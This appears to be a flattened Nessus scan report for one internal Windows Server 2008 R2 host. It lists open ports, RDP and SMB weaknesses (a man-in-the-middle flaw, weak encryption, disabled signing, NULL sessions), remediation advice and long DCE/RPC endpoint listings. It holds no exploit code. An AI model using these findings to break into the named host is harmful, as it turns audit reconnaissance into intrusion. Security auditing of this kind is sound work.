'System' settings on Windows. +The remote Terminal Services doesn't use Network Level Authentication. + + +Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc). +device_type.nasl +2011/05/23 +Device Type +2011/05/23 +combined +None +$Revision: 1.1 $ +n/a +It is possible to guess the remote device type. +Remote device type : general-purpose +Confidence level : 99 + + + +By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host. + +Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan. +cpe.nbin +2013/05/13 +Common Platform Enumeration (CPE) +2010/04/21 +local +None +$Revision: 1.19 $ +http://cpe.mitre.org/ +n/a +It is possible to enumerate CPE names that matched on the remote system. + +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2008:r2:sp1 -> Microsoft Windows Server 2008 R2 Service Pack 1 + +Following application CPE matched on the remote system : + + cpe:/a:microsoft:iis:7.5 -> Microsoft Internet Information Services (IIS) 7.5 + + + +cpe:/o:microsoft:windows +cpe:/a:microsoft:remote_desktop_protocol +The remote Terminal Services is configured to use SSL/TLS. +rdp_ssl.nasl +2013/02/25 +Terminal Services Use SSL/TLS +2013/02/22 +remote +None +$Revision: 1.2 $ +n/a +The remote Terminal Services use SSL/TLS. +Subject Name: + +Common Name: QA3APP09.RB.local + +Issuer Name: + +Common Name: QA3APP09.RB.local + +Serial Number: 6F 1D C2 73 BE DE 2D 99 40 54 BB FA 2E DC 6C DE + +Version: 3 + +Signature Algorithm: SHA-1 With RSA Encryption + +Not Valid Before: Mar 09 00:17:42 2013 GMT +Not Valid After: Sep 08 00:17:42 2013 GMT + +Public Key Info: + +Algorithm: RSA Encryption +Key Length: 2048 bits +Public Key: 00 B6 9C C3 03 8B 53 08 79 C5 6C 71 AF 1B 73 88 76 9F F1 0C + 20 79 49 D1 54 56 A1 CF 59 91 76 86 85 97 EB E1 91 33 5F 9A + 7E DA 7A 63 53 56 C7 F0 EC 0A FC 4B 85 62 D5 4D 78 BD 49 4F + 56 0E 69 A4 8F F7 D3 79 6D 16 6A 3E A4 4E 63 E9 38 CB 96 AF + 7E 03 4F A3 60 BB EA B7 24 28 94 9D DE 61 E7 AC 95 57 58 8E + D7 08 CB 6D EF 56 60 2A A2 52 75 B8 31 A9 10 CA 87 C5 BD D7 + 8C 2E 31 1D BE 39 F6 9B F4 68 65 B9 7F A8 4A 20 0A 63 D9 1A + 05 56 19 55 E1 EA 77 9F 56 F4 7D 59 2C 94 AC 75 2C 73 57 79 + A6 7D 2F FA 82 51 2C 01 1A 46 6B DA 73 24 57 6C 43 DF FE A6 + 30 E0 56 26 CD 7E 9F C0 04 55 1C 24 7A A2 7C 52 C1 48 EE 71 + 3F 1F 12 23 4F 23 4B 09 6D 2E 6B DE 51 21 02 AB 87 E6 E6 47 + 43 BC 81 B6 4D F0 C7 17 9A F0 0D 1D E1 28 C4 8A 29 0F D6 48 + 9F AC B7 B0 CF C6 4D BD CC 41 56 8A DD A3 5E 12 9F +Exponent: 01 00 01 + +Signature Length: 256 bytes / 2048 bits +Signature: 00 9F C1 3C 9C 5F 3E B2 27 12 A6 38 80 C1 55 06 FB E6 7F 55 + 74 DA 72 90 29 91 66 58 BF 8D C7 09 40 B7 9A C7 29 56 D2 84 + BC DF A4 47 1F 7B F3 E0 16 2D 76 07 2D 51 6B 1E 0D D7 BF 72 + A7 B2 6E 8C 14 B1 03 18 C9 C3 65 52 98 76 8F 35 6A 2B 80 EE + CB 71 30 B8 94 88 00 FB 81 69 BB C1 FE 0C 86 2E 9E B1 7A A3 + D2 23 60 6C 44 BD D7 2F 5F A2 ED 5A 11 DB C7 89 E0 61 F3 20 + E8 83 49 6A 6D 7C 81 2B 6D 94 1C 3B BD 6C B7 A0 23 57 20 61 + 49 68 AB B8 C9 68 3C 6B 3B 79 D0 AF 72 EC AC 61 77 78 BF B6 + B0 6C C2 ED A4 3F 39 17 88 C5 45 FD 05 36 F2 91 84 33 D8 4D + 77 EF BF 31 00 38 7B B8 99 37 03 57 82 43 72 8D F5 23 CC F8 + 46 61 C2 F0 70 75 25 63 F1 F1 2A F1 DE E8 41 9F 63 CB C9 52 + 6A 48 B7 F0 CB 28 6C 19 B8 E1 B6 E2 F8 B0 24 BF CF A2 4A FC + CC 08 AA 12 81 5A 7A FF E8 77 26 21 DE 55 8A AB 88 + +Extension: Extended Key Usage (2.5.29.37) +Critical: 0 +Purpose#1: Web Server Authentication (1.3.6.1.5.5.7.3.1) + + +Extension: Key Usage (2.5.29.15) +Critical: 0 +Key Usage: Key Encipherment, Data Encipherment + + + + + +Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc...), it is possible to guess the name of the remote operating system in use. It is also sometimes possible to guess the version of the operating system. +os_fingerprint.nasl +2013/04/01 +OS Identification +2003/12/09 +combined +None +$Revision: 2.34 $ +n/a +It is possible to guess the remote operating system. + +Remote operating system : Microsoft Windows Server 2008 R2 Standard Service Pack 1 +Confidence Level : 99 +Method : MSRPC + + +The remote host is running Microsoft Windows Server 2008 R2 Standard Service Pack 1 + + +Each ethernet MAC address starts with a 24-bit 'Organizationally Unique Identifier'. +These OUI are registered by IEEE. +ethernet_manufacturer.nasl +2011/03/27 +Ethernet Card Manufacturer Detection +2009/02/19 +combined +None +$Revision: 1.9 $ +http://standards.ieee.org/faqs/OUI.html +http://standards.ieee.org/regauth/oui/index.shtml +n/a +The manufacturer can be deduced from the Ethernet OUI. + +The following card manufacturers were identified : + +00:50:56:81:01:e3 : VMware, Inc. + + + +According to the MAC address of its network adapter, the remote host is a VMware virtual machine. + +Since it is physically accessible through the network, ensure that its configuration matches your organization's security policy. +vmware_detect.nasl +2011/03/27 +VMware Virtual Machine Detection +2005/10/27 +combined +None +$Revision: 1.24 $ +n/a +The remote host seems to be a VMware virtual machine. + + +13818 +CVE-2005-1794 +5.1 +4.6 +CVSS2#E:F/RL:W/RC:ND +CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P +The remote version of the Remote Desktop Protocol Server (Terminal Service) is vulnerable to a man-in-the-middle (MiTM) attack. The RDP client makes no effort to validate the identity of the server when setting up encryption. An attacker with the ability to intercept traffic from the RDP server can establish encryption with the client and server without being detected. A MiTM attack of this nature would allow the attacker to obtain any sensitive information transmitted, including authentication credentials. + +This flaw exists because the RDP server stores a hardcoded RSA private key in the mstlsapi.dll library. Any local user with access to this file (on any Windows system) can retrieve the key and use it for this attack. +true +Exploits are available +tssvc_mim.nasl +17131 +2012/03/30 +Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness +2005/06/01 +remote +Medium +$Revision: 1.23 $ +http://www.oxid.it/downloads/rdp-gbu.pdf +http://www.nessus.org/u?e2628096 +http://technet.microsoft.com/en-us/library/cc782610.aspx +- Force the use of SSL as a transport layer for this service if supported, or/and +- Select the 'Allow connections only from computers running Remote Desktop with Network Level Authentication' setting if it is available. +It may be possible to get access to the remote host. +2005/05/28 +OSVDB:17131 + + +cpe:/o:microsoft:windows +This script attempts to connect to the remote host via RDP (Remote Desktop Protocol) and attempts to take a screenshot of the login screen. + +While this is not a vulnerability by itself, some versions of Windows display the names of the users who can connect and which ones are connected already. +rdp_logon_screen.nbin +2013/05/08 +RDP Screenshot +2013/04/22 +remote +None +$Revision: 1.4 $ +n/a +It is possible to take a screenshot of the remote login screen. +It was possible to gather the following screenshot of the remote login screen. +293713fa5c0d44310392df3bf9c784a3 + + +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services service is not configured to use strong cryptography. + +Using weak cryptography with this service may allow an attacker to eavesdrop on the communications more easily and obtain screenshots and/or keystrokes. +rdp_weak_crypto.nbin +2013/04/22 +Terminal Services Encryption Level is Medium or Low +2012/01/25 +remote +Medium +$Revision: 1.6 $ +Change RDP encryption level to one of : + + 3. High + + 4. FIPS Compliant +The remote host is using weak cryptography. + +The terminal services encryption level is set to : + +2. Medium + + +2.6 +CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N +The encryption setting used by the remote Terminal Services service is not FIPS-140 compliant. +fips_rdp.nbin +2013/04/22 +Terminal Services Encryption Level is not FIPS-140 Compliant +2008/02/11 +remote +Low +$Revision: 1.9 $ +Change RDP encryption level to : + + 4. FIPS Compliant +The remote host is not FIPS-140 compliant. + +The terminal services encryption level is set to : + +2. Medium (Client Compatible) + + +This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, etc... + +This test is informational only and does not denote any security problem. +http_info.nasl +2011/05/31 +HyperText Transfer Protocol (HTTP) Information +2007/01/30 +remote +None +$Revision: 1.12 $ +n/a +Some information about the remote HTTP configuration can be extracted. + +Protocol version : HTTP/1.1 +SSL : no +Keep-Alive : no +Options allowed : OPTIONS, TRACE, GET, HEAD, POST +Headers : + + Content-Type: text/html + Last-Modified: Tue, 01 May 2012 20:47:11 GMT + Accept-Ranges: bytes + ETag: "ca7a095db27cd1:0" + Server: Microsoft-IIS/7.5 + X-Powered-By: ASP.NET + Date: Mon, 01 Jul 2013 18:36:55 GMT + Content-Length: 689 + + + + +Terminal Services allows a Windows user to remotely obtain a graphical login (and therefore act as a local user on the remote host). + +If an attacker gains a valid login and password, he may be able to use this service to gain further access on the remote host. An attacker may also use this service to mount a dictionary attack against the remote host to try to log in remotely. + +Note that RDP (the Remote Desktop Protocol) is vulnerable to Man-in-the-middle attacks, making it easy for attackers to steal the credentials of legitimate users by impersonating the Windows server. +windows_terminal_services.nasl +2012/03/30 +Windows Terminal Services Enabled +2002/04/20 +remote +None +$Revision: 1.29 $ +Disable Terminal Services if you do not use it, and do not allow this service to run across the Internet. +The remote Windows host has Terminal Services enabled. + + +This plugin attempts to determine the type and the version of the remote web server. +http_version.nasl +2013/06/03 +HTTP Server Type and Version +2000/01/04 +remote +None +$Revision: 1.111 $ +n/a +A web server is running on the remote host. +The remote web server type is : + +Microsoft-IIS/7.5 + + +By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. + +As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501. + +Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities. +web_directory_options.nasl +2013/05/09 +HTTP Methods Allowed (per directory) +2009/12/10 +remote +None +$Revision: 1.7 $ +n/a +This plugin determines which HTTP methods are allowed on various CGI directories. +Based on the response to an OPTIONS request : + + - HTTP methods GET HEAD POST TRACE OPTIONS are allowed on : + + / + + + + +cpe:/o:microsoft:windows +5.0 +CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N +Signing is disabled on the remote SMB server. This can allow man-in-the-middle attacks against the SMB server. +smb_signing_disabled.nasl +2012/03/05 +SMB Signing Disabled +2012/01/19 +remote +Medium +$Revision: 1.7 $ +http://support.microsoft.com/kb/887429 +http://www.nessus.org/u?74b80723 +http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html +Enforce message signing in the host's configuration. On Windows, this is found in the Local Security Policy. On Samba, the setting is called 'server signing'. See the 'see also' links for further details. +Signing is disabled on the remote SMB server. +2012/01/17 + + +The remote web server uses its default welcome page. It probably means that this server is not used at all or is serving content that is meant to be hidden. +www_default_page.nasl +2117 +2011/08/12 +Web Server Unconfigured - Default Install Page Present +2003/03/20 +remote +None +$Revision: 1.37 $ +Disable this service if you do not use it. +The remote web server is not configured or is not properly configured. +1994/01/01 +OSVDB:2117 + +The default welcome page is from IIS. + + + +It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request. +find_service.nasl +2013/05/12 +Service Detection +2007/08/19 +remote +None +$Revision: 1.123 $ +n/a +The remote service could be identified. +A web server is running on this port. + + +The name of this machine either does not resolve or resolves to a different IP address. + +This may come from a badly configured reverse DNS or from a host file in use on the Nessus scanning host. + +As a result, URLs in plugin output may not be directly usable in a web browser and some web tests may be incomplete. +bad_rdns.nasl +2011/10/06 +Inconsistent Hostname and IP Address +2010/05/03 +remote +None +1.6 +Fix the reverse DNS or host file. +The remote host's hostname is not consistent with DNS information. +The host name 'qa3app09' does not resolve to an IP address + + +Nessus was able to resolve the FQDN of the remote host. +fqdn.nasl +2012/09/28 +Host Fully Qualified Domain Name (FQDN) Resolution +2004/02/11 +remote +None +$Revision: 1.12 $ +n/a +It was possible to resolve the name of the remote host. + +10.31.112.29 resolves as qa3app09. + + + +Makes a traceroute to the remote host. +traceroute.nasl +2013/04/11 +Traceroute Information +1999/11/27 +remote +None +1.62 +n/a +It was possible to obtain traceroute information. +For your information, here is the traceroute from 172.16.138.174 to 10.31.112.29 : +172.16.138.174 +172.16.138.2 +10.31.112.29 + + + +cpe:/o:microsoft:windows +The Nessus scanner testing the remote host has been given SMB credentials to log into the remote host, however these credentials do not have administrative privileges. + +Typically, when Nessus performs a patch audit, it logs into the remote host and reads the version of the DLLs on the remote host to determine if a given patch has been applied or not. This is the method Microsoft recommends to determine if a patch has been applied. + +If your Nessus scanner does not have administrative privileges when doing a scan, then Nessus has to fall back to perform a patch audit through the registry which may lead to false positives (especially when using third-party patch auditing tools) or to false negatives (not all patches can be detected through the registry). +smb_scan_not_admin.nasl +2013/01/07 +Nessus Windows Scan Not Performed with Admin Privileges +2007/03/12 +local +None +$Revision: 1.11 $ +Reconfigure your scanner to use credentials with administrative privileges. +The Nessus scan of this host may be incomplete due to insufficient privileges provided. + +It was not possible to connect to '\\QA3APP09\ADMIN$' with the supplied credentials. + + + +It was not possible to connect to PIPE\winreg on the remote host. + +If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials. +smb_registry_fail.nasl +2011/03/27 +Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry +2007/10/04 +local +None +$Revision: 1.10 $ +n/a +Nessus is not able to access the remote Windows Registry. +Could not connect to the registry because: +Could not connect to \winreg + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 3389/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 445/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 80/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 135/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 139/tcp was found to be open + + +The remote host is running Microsoft Windows operating system or Samba, a CIFS/SMB server for Unix. It was possible to log into it using one of the following accounts : + +- NULL session +- Guest account +- Given Credentials +true +true +Exploits are available +smb_login.nasl +Microsoft Windows Authenticated User Code Execution +2013/04/23 +Microsoft Windows SMB Log In Possible +2000/05/09 +remote +None +$Revision: 1.136 $ +http://support.microsoft.com/kb/143474 +http://support.microsoft.com/kb/246261 +n/a +It is possible to log into the remote host. +1999/01/01 +- NULL sessions are enabled on the remote host + + + +It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. +smb_nativelanman.nasl +2013/06/25 +Microsoft Windows SMB NativeLanManager Remote System Information Disclosure +2001/10/17 +remote +None +$Revision: 1.40 $ +n/a +It is possible to obtain information about the remote operating system. +The remote Operating System is : Windows Server 2008 R2 Standard 7601 Service Pack 1 +The remote native lan manager is : Windows Server 2008 R2 Standard 6.1 +The remote SMB Domain Name is : RB + + + +The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests. + +Note that this plugin gathers information to be used in other plugins but does not itself generate a report. +netbios_name_get.nasl +2013/01/16 +Windows NetBIOS / SMB Remote Host Information Disclosure +1999/10/12 +remote +None +$Revision: 1.77 $ +n/a +It is possible to obtain the network name of the remote host. +The following 3 NetBIOS names have been gathered : + + QA3APP09 = Computer name + RB = Workgroup / Domain name + QA3APP09 = File Server Service + +The remote host has the following MAC address on its adapter : + + 00:50:56:81:01:e3 + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49152 : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49152 +IP : 10.31.112.29 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49153 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.29 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.29 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.29 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.29 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49175 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 +Description : Unknown RPC service +Annotation : Remote Fw APIs +Type : Remote RPC service +TCP Port : 49175 +IP : 10.31.112.29 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Remote RPC service +TCP Port : 49175 +IP : 10.31.112.29 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49173 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +TCP Port : 49173 +IP : 10.31.112.29 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49154 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.29 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.29 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.29 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.29 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.29 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.29 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49174 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49174 +IP : 10.31.112.29 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available remotely : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP09 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \pipe\lsass +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \PIPE\protected_storage +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Remote RPC service +Named pipe : \PIPE\W32TIME_ALT +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP09 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP09 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP09 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP09 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available locally : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : 